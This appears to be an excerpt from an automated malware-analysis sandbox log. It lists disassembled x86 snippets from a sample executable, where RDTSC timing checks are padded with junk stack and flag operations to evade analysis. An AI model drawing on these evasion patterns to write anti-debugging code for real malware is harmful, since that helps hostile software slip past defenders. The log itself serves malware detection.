Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547092A second address: 547094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547094B second address: 547095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201A8 second address: 54201C1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201C1 second address: 54201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201D7 second address: 54201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201DD second address: 542020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542020C second address: 542026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 and esi, 19F0DA2Eh 0x0000000f jmp 00007F4688C929E9h 0x00000014 popfd 0x00000015 call 00007F4688C929E0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4688C929DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542026B second address: 542029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B778h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542029F second address: 54202A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202A3 second address: 54202A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202A9 second address: 54202D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 jmp 00007F4688C929DAh 0x00000016 je 00007F46FA7A0D20h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202D7 second address: 54202DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202DB second address: 54202E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202E1 second address: 5420319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B777h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420319 second address: 5420331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420331 second address: 542039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F46FA729A4Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C1B774h 0x00000018 adc ecx, 42366918h 0x0000001e jmp 00007F4688C1B76Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B776h 0x0000002c jmp 00007F4688C1B775h 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542039F second address: 54203A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54203A3 second address: 54203EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [esi+44h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B779h 0x00000013 jmp 00007F4688C1B76Bh 0x00000018 popfd 0x00000019 jmp 00007F4688C1B778h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54203EF second address: 5420426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 pushfd 0x00000014 jmp 00007F4688C929DDh 0x00000019 sbb al, FFFFFF86h 0x0000001c jmp 00007F4688C929E1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420426 second address: 5420471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 51h 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B778h 0x0000000b and ch, 00000058h 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e mov ax, B22Bh 0x00000022 mov bx, cx 0x00000025 popad 0x00000026 jne 00007F46FA729989h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420471 second address: 5420477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410811 second address: 5410820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410820 second address: 5410826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410826 second address: 541082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 541082A second address: 541082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 541082E second address: 54108E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4688C1B777h 0x0000000f and esp, FFFFFFF8h 0x00000012 pushad 0x00000013 mov cx, AA0Bh 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F4688C1B76Ah 0x00000020 jmp 00007F4688C1B775h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4688C1B76Ch 0x00000030 add ecx, 28E3CE78h 0x00000036 jmp 00007F4688C1B76Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov cx, bx 0x00000042 jmp 00007F4688C1B777h 0x00000047 popad 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F4688C1B776h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F4688C1B76Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54108E2 second address: 54108F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54108F1 second address: 54109A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4688C1B771h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F4688C1B76Eh 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov dh, cl 0x0000001c call 00007F4688C1B779h 0x00000021 pop esi 0x00000022 popad 0x00000023 call 00007F4688C1B771h 0x00000028 pop ebx 0x00000029 popad 0x0000002a sub ebx, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4688C1B774h 0x00000034 pushfd 0x00000035 jmp 00007F4688C1B772h 0x0000003a add eax, 094E5648h 0x00000040 jmp 00007F4688C1B76Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54109A3 second address: 5410A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007F46FA7A8399h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E7h 0x00000021 adc eax, 59B0CE9Eh 0x00000027 jmp 00007F4688C929E9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F4688C929E0h 0x00000033 adc ecx, 30B2C098h 0x00000039 jmp 00007F4688C929DBh 0x0000003e popfd 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 pushad 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F4688C929E2h 0x0000004f sbb ax, 6AF8h 0x00000054 jmp 00007F4688C929DBh 0x00000059 popfd 0x0000005a popad 0x0000005b call 00007F4688C929DFh 0x00000060 mov eax, 45CE1B1Fh 0x00000065 pop esi 0x00000066 popad 0x00000067 mov ecx, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F4688C929DEh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410A84 second address: 5410A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410A96 second address: 5410AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA7A82DBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929DAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410AB0 second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410ABA second address: 5410B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 jne 00007F46FA731043h 0x0000001d jmp 00007F4688C1B772h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F4688C1B773h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B0D second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B35 second address: 5410B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B3B second address: 5410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B4A second address: 5410B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B50 second address: 5410B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C929DCh 0x00000010 sbb cl, FFFFFFC8h 0x00000013 jmp 00007F4688C929DBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E6h 0x00000021 xor ah, 00000028h 0x00000024 jmp 00007F4688C929DBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B9E second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 call 00007F4688C1B778h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 push edx 0x00000011 mov esi, 51A8011Bh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b jmp 00007F4688C1B777h 0x00000020 push dword ptr [ebp+14h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B774h 0x0000002a or esi, 01E4FC48h 0x00000030 jmp 00007F4688C1B76Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F4688C1B778h 0x0000003c sbb ax, 3EA8h 0x00000041 jmp 00007F4688C1B76Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F4688C1B76Bh 0x00000053 mov ax, 408Fh 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CDA second address: 5410CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CDE second address: 5410CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CE4 second address: 5410D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F4688C929E0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4688C929DAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410D15 second address: 5410D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E07 second address: 5420E7C instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, A6D2h 0x00000010 jmp 00007F4688C929E3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov eax, 19CD9A0Bh 0x0000001d jmp 00007F4688C929E0h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C929DEh 0x0000002c sbb ecx, 077A3348h 0x00000032 jmp 00007F4688C929DBh 0x00000037 popfd 0x00000038 mov dx, si 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C929DCh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E7C second address: 5420E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E82 second address: 5420E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BBC second address: 5420BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BE6 second address: 5420BFA instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, cx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, 7Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BFA second address: 5420C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C24 second address: 5420C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2A4Ah 0x00000007 mov bh, A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929E9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C4D second address: 5420C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C5D second address: 5420C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C61 second address: 5420C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C76 second address: 5420C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0682 second address: 54A0686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0686 second address: 54A068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A068A second address: 54A0690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0690 second address: 54A0696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0696 second address: 54A069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A069A second address: 54A06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4688C929DEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06D2 second address: 54A06D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06D8 second address: 54A06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06DC second address: 54A070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C1B779h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B76Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A070F second address: 54A071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54909F3 second address: 5490A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B779h 0x0000000b and cx, 6646h 0x00000010 jmp 00007F4688C1B771h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490A33 second address: 5490A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490A39 second address: 5490A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, BBh 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 mov al, dl 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4688C1B779h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430271 second address: 5430277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430277 second address: 543027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543027B second address: 543028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543028A second address: 543028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
